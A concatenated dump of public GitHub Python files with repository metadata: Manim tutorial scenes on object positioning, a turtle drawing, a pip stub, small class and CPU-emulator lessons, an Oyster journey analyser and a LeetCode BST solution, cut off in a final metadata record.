28da585df4e1bf68c48db66f2b9efd6e8cfe0290
|
89c1b69b4517499c52f808b764e26ae40ad690e5
|
refs/heads/master
| 2023-03-02T16:49:10.162667
| 2021-02-09T05:03:43
| 2021-02-09T05:03:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,110
|
py
|
from big_ol_pile_of_manim_imports import *
class OrientedObjectProgramming(Scene):
def construct(self):
titulo=Texto("Oriented-Object Programming").to_edge(UP)
ul_titulo=underline(titulo)
objeto = Circle(color=RED)
t_objeto=Texto("\\it Object")
objeto.move_to(LEFT*objeto.get_width())
t_objeto.next_to(objeto,DOWN,buff=SMALL_BUFF*2)
centro_objeto=Dot()
centro_objeto.move_to(objeto.get_center())
punta_flecha=Dot().fade(1)
punta_flecha.move_to(centro_objeto.get_center()+objeto.get_width()*RIGHT/2)
punta_flecha.rotate(35*DEGREES,about_point=centro_objeto.get_center())
flecha=Flecha(centro_objeto,punta_flecha)
def update_flecha(flecha):
new_flecha=Flecha(centro_objeto,punta_flecha)
flecha.become(new_flecha)
propiedades=VGroup(
Texto("Properties:"),
Texto("1. Color"),
Texto("2. Radius"),
Texto("3. Stroke"),
Texto("4. Opacity"),
Formula("\\vdots")
).arrange_submobjects(DOWN,aligned_edge=LEFT).move_to(RIGHT*2)
propiedades[1:].shift(RIGHT*0.5)
propiedades[1].add_updater(lambda m: m.set_color(objeto.get_color()))
propiedades[3].add_updater(lambda m: m.set_stroke(None,objeto.get_stroke_width()*0.5-2))
propiedades[4].add_updater(lambda m: m.fade(1-objeto.get_stroke_opacity()))
igual=Formula("=").next_to(propiedades[2],RIGHT,buff=SMALL_BUFF*1.4)
decimal = DecimalNumber(
0,
show_ellipsis=False,
num_decimal_places=2,
include_sign=False,
).next_to(igual,RIGHT,buff=SMALL_BUFF*1.3)
decimal.add_updater(lambda d: d.set_value(objeto.get_width()/2))
self.play(Escribe(titulo),GrowFromCenter(ul_titulo))
self.play(ShowCreation(objeto),Escribe(t_objeto),FadeIn(centro_objeto),FadeIn(punta_flecha))
self.add_foreground_mobject(centro_objeto)
self.play(GrowArrow(flecha))
flecha.add_updater(update_flecha)
centro_objeto.add_updater(lambda m: m.move_to(objeto.get_center()))
punta_flecha.add_updater(
lambda m: m.move_to(centro_objeto.get_center()+objeto.get_width()*RIGHT/2)\
.rotate(35*DEGREES,about_point=centro_objeto.get_center())
)
t_objeto.add_updater(lambda m: m.next_to(objeto,DOWN,buff=SMALL_BUFF*2))
self.play(LaggedStart(FadeIn,propiedades))
self.wait()
self.play(ApplyMethod(objeto.set_color,YELLOW))
self.play(FadeIn(igual),FadeIn(decimal))
self.play(ApplyMethod(objeto.scale,2))
self.play(ApplyMethod(objeto.set_stroke,None,11))
self.play(ApplyMethod(objeto.set_stroke,None,None,0.2))
self.wait()
self.play(FadeOut(propiedades),FadeOut(centro_objeto),FadeOut(flecha),FadeOut(decimal),FadeOut(igual))
objeto2=objeto.copy().set_stroke(None,None,0)
self.play(objeto2.move_to,RIGHT*2,objeto2.scale,0.5,objeto2.set_stroke,BLUE,4,1)
t_objeto2=Texto("\\it Object 2").next_to(objeto2,DOWN,buff=SMALL_BUFF*1.3)
self.play(Escribe(t_objeto2))
self.wait()
self.play(*[FadeOut(obj)for obj in [objeto2,objeto,t_objeto2,t_objeto]])
cambio_propiedades=Formula("object.","function","(","parameters",")",alignment="\\tt")
cambio_propiedades[1].set_color(BLUE)
cambio_propiedades[-2].set_color(ORANGE)
cambio_propiedades.scale(2)
KeyBoard(self,cambio_propiedades[0])
KeyBoard(self,cambio_propiedades[1])
KeyBoard(self,cambio_propiedades[2])
KeyBoard(self,cambio_propiedades[3])
KeyBoard(self,cambio_propiedades[4])
self.wait()
class AbsolutePositions(Scene):
def construct(self):
t_to_edge=Texto("\\tt .to\\_edge()")
t_to_edge[1:-2].set_color(BLUE)
t_to_corner=Texto("\\tt .to\\_corner()")
t_to_corner[1:-2].set_color(BLUE)
t_move_to=Texto("\\tt .move\\_to()")
t_move_to[1:-2].set_color(BLUE)
t_next_to=Texto("\\tt .next\\_to()")
t_next_to[1:-2].set_color(BLUE)
t_shift=Texto("\\tt .shift()")
t_shift[1:-2].set_color(BLUE)
pos_abs=VGroup(t_to_edge,t_to_corner).arrange_submobjects(DOWN,aligned_edge=LEFT)
b_pos_abs=Brace(pos_abs,LEFT)
t_pos_abs=b_pos_abs.get_text("Absolute positions")
g_pos_abs=VGroup(pos_abs,b_pos_abs,t_pos_abs)
pos_rel=VGroup(t_move_to,t_next_to,t_shift).arrange_submobjects(DOWN,aligned_edge=LEFT)
b_pos_rel=Brace(pos_rel,LEFT)
t_pos_rel=b_pos_rel.get_text("Relative positions")
g_pos_rel=VGroup(pos_rel,b_pos_rel,t_pos_rel)
pos=VGroup(g_pos_abs,g_pos_rel).arrange_submobjects(DOWN,aligned_edge=LEFT)
b_pos=Brace(pos,LEFT)
t_pos=b_pos.get_text("Positions")
g_pos=VGroup(pos,b_pos,t_pos)
g_pos.move_to(ORIGIN)
objeto = Dot(color=RED).to_edge(UP)
obj_vista=VGroup()
self.play(Escribe(t_pos))
obj_vista.add(t_pos)
self.wait(2)
self.play(GrowFromCenter(b_pos))
obj_vista.add(b_pos)
self.wait(2)
self.play(Escribe(t_pos_abs),Escribe(t_pos_rel))
obj_vista.add(t_pos_abs,t_pos_rel)
self.wait(2)
self.play(FadeToColor(t_pos_abs,RED))
self.play(GrowFromCenter(objeto))
self.wait(2)
for d in [DOWN,LEFT,RIGHT]:
self.play(objeto.to_edge,d)
self.play(objeto.scale,0)
self.wait(2)
self.play(GrowFromCenter(b_pos_abs))
obj_vista.add(b_pos_abs)
KeyBoard(self,t_to_edge)
obj_vista.add(t_to_edge)
self.wait()
self.play(FadeOut(obj_vista))
def Codigo(texto):
texto_c=TikzMobject("""
\\begin{lstlisting}[language=Python,style=basic,numbers=none]
%s
\\end{lstlisting}
"""%texto).set_stroke(None,0).set_fill(WHITE,1)
return texto_c
direcciones = VGroup(*[Codigo("%s"%d)
for d in ["UP = np.array([ 0, 1,0])",
"DOWN = np.array([ 0,-1,0])",
"LEFT = np.array([-1, 0,0])",
"RIGHT = np.array([ 1, 0,0])"]],
).arrange_submobjects(DOWN,aligned_edge=LEFT)
num_in=[2,4,4,5]
for d,n in zip(direcciones,num_in):
d[n].set_color(ROSA_ST)
d[n+4:n+4+5].set_color(BLUE)
direcciones.move_to(ORIGIN)
self.play(LaggedStart(FadeIn,direcciones))
self.wait(2)
pos_to_edge=VGroup(*[Texto("\\tt .to\\_edge(%s)"%d)for d in ["UP","DOWN","LEFT","RIGHT"]]).scale(0.7)
puntos_to_edge=VGroup(*[Dot().to_edge(pos)for pos in [UP,DOWN,LEFT,RIGHT]]).set_color(RED)
for pos,p_te,d in zip(pos_to_edge,puntos_to_edge,[UP,DOWN,LEFT,RIGHT]):
pos[1:8].set_color(BLUE)
pos.next_to(p_te,-d,buff=SMALL_BUFF*1.3)
for obj1,obj2 in zip(puntos_to_edge,pos_to_edge):
self.play(LaggedStart(GrowFromCenter,obj1),LaggedStart(FadeIn,obj2))
self.wait(1.5)
self.play(FadeOut(pos_to_edge),FadeOut(puntos_to_edge),FadeOut(direcciones))
self.wait(2)
self.play(FadeIn(obj_vista))
KeyBoard(self,t_to_corner)
self.wait()
self.play(FadeOut(obj_vista),FadeOut(t_to_corner))
direcciones_mixtas = VGroup(*[Codigo("%s"%d)
for d in ["UR = np.array([ 1, 1,0])",
"UL = np.array([-1, 1,0])",
"DR = np.array([ 1,-1,0])",
"DL = np.array([-1,-1,0])"]]
).arrange_submobjects(DOWN,aligned_edge=LEFT)
direcciones_mixtas.move_to(ORIGIN)
num_in2=[2,2,2,2]
for d,n in zip(direcciones_mixtas,num_in2):
d[n].set_color(ROSA_ST)
d[n+4:n+4+5].set_color(BLUE)
self.play(LaggedStart(FadeIn,direcciones_mixtas))
pos_to_corner=VGroup(*[Texto("\\tt .to\\_corner(%s)"%d)for d in ["UR","UL","DR","DL"]])
puntos_to_corner=VGroup(*[Dot().to_edge(pos)for pos in [UR,UL,DR,DL]]).set_color(RED)
for pos,p_te,d in zip(pos_to_corner,puntos_to_corner,[UR,UL,DR,DL]):
pos[1:10].set_color(BLUE)
pos.next_to(p_te,-d,buff=SMALL_BUFF*1.3)
for obj1,obj2 in zip(puntos_to_corner,pos_to_corner):
self.play(LaggedStart(GrowFromCenter,obj1),LaggedStart(FadeIn,obj2))
self.wait(1.5)
self.wait(2)
self.play(FadeOut(pos_to_corner),FadeOut(puntos_to_corner),FadeOut(direcciones_mixtas))
punto_esquina=Dot().to_edge(LEFT,buff=-0.08)
punto_movimiento=Dot(color=YELLOW).scale(3).to_edge(LEFT,buff=1.5)
linea_mov=Line(punto_esquina.get_center(),punto_movimiento.get_left()).fade(1)
med=Medicion(linea_mov,dashed=True,buff=0.5).add_tips()
t_buff=Texto(r"\textit{\texttt{buff}}$=$").next_to(punto_movimiento,UR)
t_buff[:-1].set_color(ORANGE)
t_buff[-1].set_color(ROSA_ST)
decimal = DecimalNumber(
0,
show_ellipsis=False,
num_decimal_places=2,
include_sign=False,
).next_to(t_buff,RIGHT,buff=SMALL_BUFF*1.3)
decimal.add_updater(lambda m: m.set_value(linea_mov.get_length()).next_to(t_buff,RIGHT,buff=SMALL_BUFF*1.3))
self.play(
GrowFromCenter(med),
Escribe(VGroup(t_buff,decimal)),
GrowFromCenter(punto_movimiento)
)
self.add(linea_mov)
def update_med(med):
new_med=Medicion(linea_mov,dashed=True,buff=0.5).add_tips()
med.become(new_med)
def update_lin(linea_mov):
new_linea_mov=Line(punto_esquina.get_center(),punto_movimiento.get_left()).fade(1)
linea_mov.become(new_linea_mov)
linea_mov.add_updater(update_lin)
med.add_updater(update_med)
t_buff.add_updater(lambda m: m.next_to(punto_movimiento,UR))
self.play(punto_movimiento.shift,LEFT,run_time=5)
self.wait(2)
self.play(
*[FadeOut(obj)for obj in [decimal,t_buff,med,punto_movimiento]]
)
#'''
t_pos_abs.set_color(WHITE)
t_pos_rel.set_color(RED)
self.play(FadeIn(obj_vista),FadeIn(t_to_corner))
self.wait(2)
self.play(GrowFromCenter(b_pos_rel))
self.wait(2)
for obj in pos_rel:
KeyBoard(self,obj)
self.wait(2)
self.wait(2)
#self.play(GrowFromCenter(b_pos_abs))
#self.wait(2)
#'''
class Grid(VMobject):
CONFIG = {
"height": 6.0,
"width": 6.0,
}
def __init__(self, rows, columns, **kwargs):
digest_config(self, kwargs, locals())
VMobject.__init__(self, **kwargs)
def generate_points(self):
x_step = self.width / self.columns
y_step = self.height / self.rows
for x in np.arange(0, self.width + x_step, x_step):
self.add(Line(
[x - self.width / 2., -self.height / 2., 0],
[x - self.width / 2., self.height / 2., 0],
))
for y in np.arange(0, self.height + y_step, y_step):
self.add(Line(
[-self.width / 2., y - self.height / 2., 0],
[self.width / 2., y - self.height / 2., 0]
))
class ScreenGrid(VGroup):
CONFIG = {
"rows":8,
"columns":14,
"height": FRAME_Y_RADIUS*2,
"width": 14,
"grid_stroke":0.5,
"grid_color":WHITE,
"axis_color":RED,
"axis_stroke":2,
"show_points":False,
"point_radius":0,
"labels_scale":0.5,
"labels_buff":0,
"number_decimals":2,
"fade":0.5
}
def __init__(self,**kwargs):
VGroup.__init__(self,**kwargs)
rows=self.rows
columns=self.columns
grilla=Grid(width=self.width,height=self.height,rows=rows,columns=columns).set_stroke(self.grid_color,self.grid_stroke)
vector_ii=ORIGIN+np.array((-self.width/2,-self.height/2,0))
vector_id=ORIGIN+np.array((self.width/2,-self.height/2,0))
vector_si=ORIGIN+np.array((-self.width/2,self.height/2,0))
vector_sd=ORIGIN+np.array((self.width/2,self.height/2,0))
ejes_x=Line(LEFT*self.width/2,RIGHT*self.width/2)
ejes_y=Line(DOWN*self.height/2,UP*self.height/2)
ejes=VGroup(ejes_x,ejes_y).set_stroke(self.axis_color,self.axis_stroke)
divisiones_x=self.width/columns
divisiones_y=self.height/rows
direcciones_buff_x=[UP,DOWN]
direcciones_buff_y=[RIGHT,LEFT]
dd_buff=[direcciones_buff_x,direcciones_buff_y]
vectores_inicio_x=[vector_ii,vector_si]
vectores_inicio_y=[vector_si,vector_sd]
vectores_inicio=[vectores_inicio_x,vectores_inicio_y]
tam_buff=[0,0]
divisiones=[divisiones_x,divisiones_y]
orientaciones=[RIGHT,DOWN]
puntos=VGroup()
leyendas=VGroup()
for tipo,division,orientacion,coordenada,vi_c,d_buff in zip([columns,rows],divisiones,orientaciones,[0,1],vectores_inicio,dd_buff):
for i in range(1,tipo):
for v_i,direcciones_buff in zip(vi_c,d_buff):
ubicacion=v_i+orientacion*division*i
punto=Dot(ubicacion,radius=self.point_radius)
coord=round(punto.get_center()[coordenada],self.number_decimals)
leyenda=TextMobject("%s"%coord).scale(self.labels_scale).fade(self.fade)
leyenda.next_to(punto,direcciones_buff,buff=self.labels_buff)
puntos.add(punto)
leyendas.add(leyenda)
self.add(grilla,ejes,leyendas)
if self.show_points==True:
self.add(puntos)
class RelativePosition1(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
coord=Formula("(1,2)")
self.add(grilla)
self.wait()
self.play(GrowFromCenter(dot))
self.play(dot.move_to,RIGHT+UP*2)
coord.next_to(dot,RIGHT)
self.play(FadeIn(coord))
self.wait(3)
class RelativePosition2(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
text=Texto("Text").move_to(3*LEFT+2*UP)
dot.move_to(text)
self.add(grilla)
self.wait()
self.play(Escribe(text))
self.play(GrowFromCenter(dot))
self.wait()
self.play(dot.shift,RIGHT*5)
self.wait(7)
class RelativePositionMT(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
text=Texto("Text").move_to(3*LEFT+2*UP)
dot.move_to(text)
self.add(grilla)
self.wait()
self.play(Escribe(text))
self.play(GrowFromCenter(dot))
self.wait()
self.play(dot.shift,RIGHT*5)
self.wait()
linea=Line(text.get_center(),dot.get_center())
med=Medicion(linea,dashed=True).add_tips()
self.add(med)
class RelativePositionNT(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
text=Texto("Text").move_to(3*LEFT+2*UP)
dot.next_to(text,RIGHT,buff=5)
self.add(grilla)
self.wait()
self.play(Escribe(text))
self.play(GrowFromCenter(dot))
self.wait()
linea=Line(text.get_right(),dot.get_left())
med=Medicion(linea,dashed=True).add_tips()
self.add(med)
class RotateP(Scene):
def construct(self):
grid=ScreenGrid()
cod=Formula("\\tt object.","rotate","(","110*DEGREES,","\\mbox{\\textit{\\texttt{about\\_point}}}","=","point",")")
cod[1].set_color(BLUE)
cod[4].set_color(ORANGE)
cod[5].set_color(ROSA_ST)
dot1=Dot().shift(UP)
dot2=Dot().move_to(1*DOWN)
t_dot1=TextMobject("\\tt dot1").next_to(dot1,DOWN+LEFT,buff=SMALL_BUFF)
t_dot2=TextMobject("\\tt dot2").next_to(dot2,DOWN+LEFT,buff=SMALL_BUFF)
remark=TextMobject("\\texttt{point} is a coord, not a object.").to_edge(UP)
cod.to_edge(DOWN)
self.add(grid)
self.play(GrowFromCenter(dot1),Escribe(t_dot1))
self.play(GrowFromCenter(dot2),Escribe(t_dot2))
t_dot2.add_updater(lambda m: m.next_to(dot2,DOWN+LEFT,buff=SMALL_BUFF))
self.play(Write(cod))
arc=Arc(110*DEGREES,radius=2,arc_center=dot1.get_center(),start_angle=-90*DEGREES)
self.play(Rotate(dot2,110*DEGREES,about_point=dot1.get_center()),ShowCreation(arc))
self.play(Write(remark))
self.wait()
class FormulasLatex(Scene):
def construct(self):
for1=Formula(r"\int_a^b f(x)dx")
for2=Formula(r"\lim_{x\to\infty}\frac{1}{x}=0")
for3=Formula(r"\frac{d}{dx}f(x)=\lim_{h\to 0}\frac{f(x+h)-f(x)}{h}")
for4=Formula(r"e^{\pi i}+1=0")
for5=Formula(r"\rho\frac{D{\bf u}}{Dt}=-\nabla p + \nabla\cdot\tau + \rho{\bf g}")
form=VGroup(
for1,
for2,
for3,
for4,
).set_color_by_gradient(PURPLE,ORANGE,BLUE)
for obj,pos in zip(form,[UR,UL,DR,DL]):
obj.to_corner(pos)
self.play(*[Escribe(obj)for obj in form], Escribe(for5))
self.wait(4)
class MoveToScene(Scene):
def construct(self):
grid=ScreenGrid()
self.add(grid)
move_to_center=Formula("\\tt .move\\_to(","vector)")
move_to_center[0][1:-1].set_color(BLUE)
move_to_object=Formula("\\tt .move\\_to(","reference\\_object.","get\\_center","()+vector)")
move_to_object[0][1:-1].set_color(BLUE)
move_to_object[2].set_color(BLUE)
t_move_to=VGroup(move_to_center,move_to_object).arrange_submobjects(DOWN,aligned_edge=LEFT)
t_move_to.to_corner(DL)
rec=Rectangle(width=t_move_to.get_width(),height=t_move_to.get_height()).move_to(t_move_to)\
.set_stroke(None,0,0).set_fill(BLACK,0.8)
punto=Dot()
cuadro=Square(fill_opacity=1).match_width(punto).set_color(YELLOW)
flecha=VFlecha(ORIGIN,2*UP+3*RIGHT).set_color(PURPLE)
t_flecha=TextMobject("\\tt vector")
self.play(GrowFromCenter(punto))
self.wait(2)
self.play(FadeIn(rec))
KeyBoard(self,move_to_center[0])
KeyBoard(self,move_to_center[1])
self.wait(3)
self.add_foreground_mobject(punto)
self.play(punto.move_to,2*UP+3*RIGHT,GrowArrow(flecha))
self.wait(3)
t_flecha.next_to(flecha,DOWN,buff=0.2)
self.play(ReplacementTransform(flecha[0].copy(),t_flecha))
self.wait(3)
KeyBoard(self,move_to_object[0])
KeyBoard(self,move_to_object[1])
KeyBoard(self,move_to_object[2])
KeyBoard(self,move_to_object[3])
cuadro.move_to(DOWN+LEFT*2)
flecha_cuadro=VFlecha(cuadro.get_center(),cuadro.get_center()+3*UP+LEFT).set_color(PURPLE)
self.play(ReplacementTransform(move_to_object[1].copy(),cuadro))
self.wait(2)
self.add_foreground_mobject(cuadro)
self.play(ReplacementTransform(flecha,flecha_cuadro),punto.move_to,cuadro.get_center()+3*UP+LEFT,
t_flecha.next_to,flecha_cuadro,DOWN,{"buff":0.2})
self.wait(2)
|
[
"davz95@hotmail.com"
] |
davz95@hotmail.com
|
45269fe78e3d719ac99c24d5bc4cd93dfa49ca21
|
51ede9626838cc3131e41c1a4681ff8d8af8e45f
|
/session4/Turtle/triangle.py
|
d2cdcf458ffe31173e8ccd1a764008eddfde4531
|
[] |
no_license
|
longngo2002/C4TB
|
2d0431949df714d5df8a22ab6b5716dd68c71fa8
|
191c6ad4fb2051d15d8330ef6d021f03c12ce41c
|
refs/heads/master
| 2020-06-16T10:06:14.915265
| 2019-08-24T07:44:36
| 2019-08-24T07:44:36
| 195,533,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
from turtle import *
color("green")
fillcolor("yellow")
begin_fill()
forward(200)
left(120)
forward(200)
left(120)
forward(200)
end_fill()
mainloop()
|
[
"vipcom247@gmail.com"
] |
vipcom247@gmail.com
|
7cc6891cf33ed38c1f157f9bdd0c84d53b7b6401
|
dc9b0ea6714c29651cfd8b494862f31f07d85f28
|
/project9/venv/Scripts/pip3-script.py
|
b6b74138b57b60b38ead8ed47e96d33a675b322b
|
[] |
no_license
|
Papashanskiy/PythonProjects
|
c228269f0aef1677758cb6e2f1acdfa522da0a02
|
cf999867befa7d8213b2b6675b723f2b9f392fd7
|
refs/heads/master
| 2022-12-12T15:23:56.234339
| 2019-02-10T09:14:56
| 2019-02-10T09:14:56
| 148,336,536
| 0
| 0
| null | 2022-12-08T03:01:04
| 2018-09-11T15:10:44
|
Python
|
WINDOWS-1251
|
Python
| false
| false
| 436
|
py
|
#!C:\Users\Игорь\Desktop\Python\PythonProjects\project9\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
|
[
"apashanskiy@gmail.com"
] |
apashanskiy@gmail.com
|
e29d1c1cb5e95478cad566d18766a86d828dc9db
|
71defe8f65d87d9d5ca8af3176f58ef5052beeec
|
/Dynamic-Class-Calling-04-01-20/SO_dynamic_class_call.py
|
6416944886fd44ba0e87e87515f33daf5fa356a2
|
[] |
no_license
|
vw-liane/SO_CR_Questions
|
2dbea04c382a0626d3957c36e9596c2797286545
|
226d5dff3a822ad2e79672083bfe2c15c6a81afe
|
refs/heads/master
| 2021-05-20T13:38:51.335877
| 2020-04-07T20:51:39
| 2020-04-07T20:51:39
| 252,318,802
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,322
|
py
|
from pathlib import Path
import pandas as pd
import inspect
## SUPER CLASSES
################
class Fruit(object):
def __init__(self):
self.name = "fruit"
def __str__(self):
return f"{self.name} object"
class Vegetable(object):
def __init__(self):
self.name = "vegetable"
def __str__(self):
return f"{self.name} object"
## SUB CLASSES
##############
class Grape(Fruit):
def __init__(self):
self.name = "grape"
def __str__(self):
return f"{self.name} object"
class Cucumber(Vegetable):
def __init__(self):
self.name = "cucumber"
def __str__(self):
return f"{self.name} object"
def extract_ser():
sub_cls_ser = {} # holds the series of grapes -or- cucumbers
classes_path = Path('Classes') # starting folder
for super_class in classes_path.iterdir(): # Path of Fruit -or- Vegetable Folder
for sub_class in super_class.iterdir(): # Path of <grapes.csv> -or- <cucumbers.csv>
df_csv = pd.read_csv(sub_class) # dataframe assignment
df_ser = df_csv.iloc[:,0] # series assignment
sub_cls_ser[eval((sub_class.stem[:-1]).capitalize())] = df_ser # [ClassName] = series
return sub_cls_ser
def make_objs(sub_ser):
for cls_key, ser_val in sub_ser.items():
make_cls = lambda cls: cls_key()
print(f"Check DF obj_key: {cls_key} \n Type: {cls_key}")
obj_df = ser_val.apply(make_cls) # is safer because only using in .apply()?
print(f"After .apply()::\nCheck OBJ_DF Contents\n{obj_df}\n")
## RECURSIVE THROUGH TREE
def trav_tree(tree):
for indx, elem in enumerate(tree):
for jdx, sub in enumerate(elem):
print(f"Index: {jdx}\nSub-Elem: {sub}\n\n")
if __name__ == "__main__":
sub_cls_series = extract_ser()
make_objs(sub_cls_series)
cls_list = [Vegetable, Fruit, Grape, Cucumber]
the_tree = inspect.getclasstree(classes=cls_list)
trav_tree(the_tree)
my_fab_cuc = Cucumber()
print(f"Is my_fab_cuc an instance of Vegetable?: {isinstance(my_fab_cuc, Vegetable)}")
print(f"Is my_fab_cuc an instance of Cucumber?: {isinstance(my_fab_cuc, Cucumber)}")
|
[
"noreply@github.com"
] |
vw-liane.noreply@github.com
|
c23b662a550c30d7a3cb726d20f1668874730de4
|
c770679730937a2dc3e9ec62d721c2782b44e6d0
|
/lesson/beej.py
|
98e870a4b13ee7fd0cd21ff1d9e9a2d9b4e5bf19
|
[] |
no_license
|
Lambda-CS/Computer-Architecture
|
6156d9fef458183de5918c54f910e47e2b80d4e7
|
947b28fd319c074313b0b0a0c5df26bbb91c9f32
|
refs/heads/master
| 2022-11-20T17:35:21.651380
| 2020-07-26T02:10:38
| 2020-07-26T02:10:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,285
|
py
|
"""
CPU
Executing instructions
Gets them out of RAM
Registers (like variables)
Fixed names R0-R7
Fixed number of them -- 8 of them
Fixed size -- 8 bits
Memory (RAM)
A big array of bytes
Each memory slot has an index, and a value stored at that index
That index into memory AKA:
pointer
location
address
"""
memory = [
1, # PRINT_BEEJ
1, # PRINT_BEEJ
1, # PRINT_BEEJ
3, # SAVE_REG R2,64 register to save in, the value save there
2, # R2
64, # 64
4, # PRINT_REG R2
2, # R2
2, # HALT <-- pc
]
register = [0] * 8
pc = 0 # Program Counter, index into memory of the current instruction
# AKA a pointer to the current instruction
running = True
while running:
inst = memory[pc]
if inst == 1: # PRINT_BEEJ
print("Beej")
pc += 1
elif inst == 2: # HALT
running = False
elif inst == 3: # SAVE_REG
reg_num = memory[pc + 1]
value = memory[pc + 2]
register[reg_num] = value
pc += 3
elif inst == 4: # PRINT_REG
reg_num = memory[pc + 1]
print(register[reg_num])
pc += 2
else:
print(f"Unknown instruction {inst}")
|
[
"antonyk@users.noreply.github.com"
] |
antonyk@users.noreply.github.com
|
29d796e42ac5d264ce6c00a8cbc9464e9d67014d
|
3e46efd609c829ec3c45fab7b11daa2ddcae45f2
|
/thathweb/production.py
|
f263cdf69a7ada42e25f1c4218f62908d536d165
|
[] |
no_license
|
travishathaway/thathweb
|
2b0f1c2f4941082d66b7633ae0686382335471d9
|
9f0ef221cdeef3a6b0240488fe10bc6d11371280
|
refs/heads/master
| 2020-04-18T05:27:03.172744
| 2014-08-03T19:03:27
| 2014-08-03T19:03:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 71
|
py
|
from thathweb.settings import *
DEBUG = False
TEMPLATE_DEBUG = False
|
[
"travis.j.hathaway@gmail.com"
] |
travis.j.hathaway@gmail.com
|
5f0f59332ec2a54a6ae41d1a6ec0b45e70055095
|
87b9cd8a7c94f4a52e2fa608aa4fa7904e8d5fbb
|
/oyster/journey_analyser.py
|
e6cc302fe876fbc947d21a4b4ffdd9559923bc73
|
[] |
no_license
|
chbatey/oystergrep
|
87b9b5c76f6a3a96b71e31a7f19f71f0419e5ba6
|
886e1aec3d786bd51f485816aa0e07241d9fcccf
|
refs/heads/master
| 2016-09-11T03:52:00.434354
| 2013-06-23T20:00:21
| 2013-06-23T20:00:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,036
|
py
|
import logging
import calendar
class JourneyAnalyser:
def analyse_journeys(self, journeys):
total_cost = 0
journeys_by_month = {}
for journey in journeys:
total_cost += journey.cost
month = journey.date.month
logging.debug("Month %s" % month)
if month not in journeys_by_month:
journeys_by_month[month] = []
journeys_by_month[month].append(journey)
return JourneyAnalysis(total_cost, journeys_by_month)
class JourneyAnalysis:
def __init__(self, total_cost, journeys_by_month):
self.total_cost = total_cost
self.journeys_by_month = journeys_by_month
def get_total_cost(self):
return self.total_cost
def get_month_breakdown(self, month):
if month in self.journeys_by_month:
return MonthBreakDown(self.journeys_by_month[month], month)
else:
return MonthBreakDown([], month)
class MonthBreakDown:
def __init__(self, journeys, month):
self._journeys = journeys
self._month = month
pass
def get_total_cost(self):
total = 0.0
for journey in self._journeys:
total += journey.cost
return total
def get_journeys(self):
return self._journeys
def get_week_breakdown(self):
weeks = self.get_weeks(2013, self._month)
for week in weeks:
week._add_journeys(self._journeys)
return weeks
def get_weeks(self, year, month):
cal = calendar.Calendar()
iterator = cal.itermonthdates(year, month)
day_of_week = 0
weeks = []
current_week = []
for date in iterator:
day_of_week += 1
if date.month == month:
current_week.append(date)
if day_of_week == 7:
weeks.append(WeekBreakdown(current_week[0], current_week[-1]))
day_of_week = 0
current_week = []
return weeks
class WeekBreakdown:
def __init__(self, start_date, end_date):
self._end_date = end_date
self._start_date = start_date
self._journeys = []
def get_start_date(self):
return self._start_date
def get_end_date(self):
return self._end_date
def _add_journeys(self, journeys):
for journey in journeys:
if self._start_date <= journey.date.date() <= self._end_date:
self._journeys.append(journey)
def get_journeys(self):
return self._journeys
def get_summary(self):
to_return = "Week: " + str(self._start_date) + " to " + str(self._end_date) + " " + str(self.get_total_cost()) + "\n"
for journey in self._journeys:
to_return += str(journey.date) + " " + str(journey.cost) + " " + journey.description + "\n"
return to_return
def get_total_cost(self):
total = 0.0
for journey in self._journeys:
total += journey.cost
return total
|
[
"christopher.batey@gmail.com"
] |
christopher.batey@gmail.com
|
f035a5e710ff8c6c6c19a8887f9b5988f0cf5cc1
|
c642371b301168af9130c33564566513681af824
|
/leetcode/leetcode108.py
|
35a9037c7ea3d3ecd314a4b6e4c3e64954e9cb8b
|
[] |
no_license
|
fucct/Algorithm-python
|
974aed1b4538397ff40f1da243596c0a05eacaa5
|
fce6ae44df3a4985011850fe85d99d28f7f7b53f
|
refs/heads/master
| 2022-12-12T15:16:46.982614
| 2020-09-07T13:19:09
| 2020-09-07T13:19:09
| 291,237,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
from typing import List
from leetcode.leetcode100 import TreeNode
class Solution:
def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
if not nums:
return
mid = len(nums) // 2
root = TreeNode(nums[mid])
root.left = self.sortedArrayToBST(nums[0:mid])
root.right = self.sortedArrayToBST(nums[mid+1:])
return root
|
[
"dqrd123@gmail.com"
] |
dqrd123@gmail.com
|
e583114fef71a6d19de920b44c44188a46dc0fa3
|
396787df1b472ddfab7d934c149b150352342f03
|
/python_server/app/venv/lib/python3.6/abc.py
|
f8e195b4163e5b20c50a27852d19d733e39f6d31
|
[] |
no_license
|
Deanwinger/python_project
|
a47b50a9dfc88853a5557da090b0a2ac3f3ce191
|
8c0c2a8bcd51825e6902e4d03dabbaf6f303ba83
|
refs/heads/master
| 2022-07-10T16:41:56.853165
| 2019-07-21T13:08:48
| 2019-07-21T13:08:48
| 107,653,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 57
|
py
|
/Users/yucheng/.pyenv/versions/3.6.5/lib/python3.6/abc.py
|
[
"a541203951@163.com"
] |
a541203951@163.com
|
b99ea9b50ddacb576b647352eaa380cb3fe01ead
|
52a4d282f6ecaf3e68d798798099d2286a9daa4f
|
/old/numbo3b.py
|
e2056fe597131fa362550170c99661273978b41b
|
[
"MIT"
] |
permissive
|
bkovitz/FARGish
|
f0d1c05f5caf9901f520c8665d35780502b67dcc
|
3dbf99d44a6e43ae4d9bba32272e0d618ee4aa21
|
refs/heads/master
